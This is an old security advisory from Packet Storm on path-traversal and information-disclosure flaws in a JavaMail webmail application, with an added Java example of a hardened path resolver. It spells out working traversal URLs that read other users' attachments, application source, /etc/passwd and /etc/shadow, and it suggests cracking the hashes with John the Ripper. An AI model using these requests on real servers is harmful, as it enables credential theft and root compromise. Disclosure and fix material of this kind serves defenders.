javamailAPI.txt

14 Aug 2005 00:00:00, reported by Thet Aung Min Latt. Type: packetstorm. Source: packetstormsecurity.com

JavaMail API Multiple Information Disclosure Vulnerabilities. An attacker can access mailbox attachments, download configuration information, and compromise root/admin accounts on target machines.

Code
`  
  
Javamail Multiple Information Disclosure Vulnerabilities  
  
May 25, 2005, Yangon, Myanmar.  
  
Vulnerable Systems:  
* JavaMail API 1.3  
* JavaMail API 1.2  
* JavaMail API 1.1.3  
  
Tested on Apache Tomcat/5.0.16  
Possibly on all versions of Windows  
  
ReadMessage.jsp fails to restrict access to other directories and files:  
  
File Name:<%=mp.getFileName()%><br>  
Type: <%=abc.getContent_Type()%><br>  
Size: <%=abc.getMsgSize()/1024%>Kb<br><a href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" + abc.getFileName() %>" target="_new"> download </a><br>  
  
<%=abc.getFilePath() + "/" + abc.getFileName() %>  
  
This hands an attacker any file on the system, because the download link is built directly from getFilePath() + "/" + abc.getFileName() and the resulting path is passed to docdownloadfile.jsp without restriction.  
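The following is an added example, not code from the advisory or from the JavaMail webmail application it describes. It places the vulnerable pattern (the request parameter is used as the path) beside a hardened resolver that only accepts leaf names, joins them under the authenticated user's own mailbox directory, and checks that the normalized result stays inside it; the class name, method names and the MAILBOX_ROOT constant are assumptions modelled on the advisory's URLs.

```java
// Added example, not part of the advisory or the webmail application.
// Assumed layout from the advisory: /var/serviceprovider/web/mailboxesdir/<user>/<messageid>/<file>
import java.nio.file.Path;
import java.nio.file.Paths;

public class SafeAttachmentPath {
    // Root directory under which every user's mailbox lives (assumption taken from the advisory's URLs).
    static final Path MAILBOX_ROOT = Paths.get("/var/serviceprovider/web/mailboxesdir");

    // Mirrors the vulnerable ReadMessage.jsp / docdownloadfile.jsp behaviour:
    // whatever the client supplies in the f parameter is the file that gets served.
    static String vulnerableResolve(String fParam) {
        return fParam;
    }

    // Hardened version: the client names only a message id and a file name, never a path.
    // The server derives the directory from the authenticated session, not from the request.
    static Path safeResolve(String authenticatedUser, String messageId, String fileName) {
        // Each component must be a single leaf name: no separators, no "." or "..".
        for (String part : new String[] { authenticatedUser, messageId, fileName }) {
            if (part == null || part.isEmpty() || part.contains("/") || part.contains("\\")
                    || part.equals(".") || part.equals("..")) {
                throw new IllegalArgumentException("invalid path component: " + part);
            }
        }
        Path userDir = MAILBOX_ROOT.resolve(authenticatedUser).normalize();
        Path target = userDir.resolve(messageId).resolve(fileName).normalize();
        // Containment check: after normalization the target must still lie under the user's directory.
        if (!target.startsWith(userDir)) {
            throw new IllegalArgumentException("path escapes mailbox directory: " + target);
        }
        return target;
    }

    public static void main(String[] args) {
        // Constructed inputs modelled on the advisory's example URLs.
        System.out.println("vulnerable: " + vulnerableResolve("/var/serviceprovider/web/WEB-INF/web.xml"));
        System.out.println("safe: " + safeResolve("user@example.com", "messageid123@user", "report.pdf"));
        try {
            safeResolve("user@example.com", "messageid123@user", "../../WEB-INF/web.xml");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        try {
            safeResolve("user@example.com", "..", "web.xml");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same containment check applies to the Download servlet the advisory describes later: the path served must be derived from the session's user and a validated leaf name, never from the query string.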
  
1. Open specific mailbox attachment  
2. Download .jsp source code and configuration information of javamail  
3. Target machine Root/Admin Compromise  
4. Download server information  
  
1. Open specific mailbox attachment  
  
When a user downloads a message attachment from the JavaMail webmail, an attacker may notice the URL   
http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/[email protected]/messageid123@user/filename.extension  
  
Then, noticing that the URL led to /var folders, I tried switching folders.  
  
http://example.com/var/serviceprovider/web/mailboxesdir/[email protected]/messageid123@user  
  
But this gave errors. Finally, on reaching this URL  
  
http://example.com/mailboxesdir/[email protected]/  
  
it produced a listing of the attachments present in [email protected].   
  
Even unauthorized users are able to view a specific mailbox's attachments. An attacker needs to know only the username in order to obtain the attachment listing.   
  
http://example.com/mailboxesdir/[email protected]/  
  
  
  
2. Download configuration information of javamail  
  
I also noticed that docdownloadfile.jsp redirects to the location of the file on the server using the parameter f; the web browser actually receives the redirected name   
  
http://example.com/Download?/var/serviceprovider/web/mailboxesdir/[email protected]/messageid123@user/filename.extension  
  
This information leads to web.xml:  
  
http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml  
  
  
which gives the configuration information of the JavaMail application.  
  
Download the source code of JSP files:  
http://example.com/Download?/var/serviceprovider/web/login.jsp  
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp  
http://example.com/Download?/var/serviceprovider/web/addbook.jsp  
http://example.com/Download?/var/serviceprovider/web/compose.jsp  
http://example.com/Download?/var/serviceprovider/web/folder.jsp  
  
3. Target machine Root/Admin Compromise  
  
In UNIX, /etc/passwd and /etc/shadow are important files which   
  
A little curious, I looked in the web browser, typing:  
http://example.com/Download?/etc/passwd  
  
An example of such a password file is:  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
  
Then crack the Unix password files with John the Ripper.  
  
John can be found practically anywhere. For example, try going to altavista.com and running a search for 'john the ripper'.   
  
http://example.com/Download?/etc/shadow  
  
root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::  
adm:*:133334:0:22222:7:::  
ftp:*:133334:0:2222:7:::  
  
http://example.com/Download?/etc/group  
/etc/group file:  
  
root:x:0:  
daemon:x:1:  
bin:x:2:  
sys:x:3:  
adm:x:4:  
tty:x:5:  
disk:x:6:  
lp:x:7:lp  
mail:x:8:  
news:x:9:  
uucp:x:10:  
proxy:x:13:  
  
  
Once the attacker obtains the root/admin information of the target server, any further attack becomes possible: website defacement, database alteration, data theft and more.  
  
4. Download server information  
  
http://example.com/Download?/var/log/boot.log  
http://example.com/Download?/var/log/maillog  
And more can be done.  
  
By   
Thet Aung Min Latt [email protected]  
http://thetaung.amyanmar.com  
`
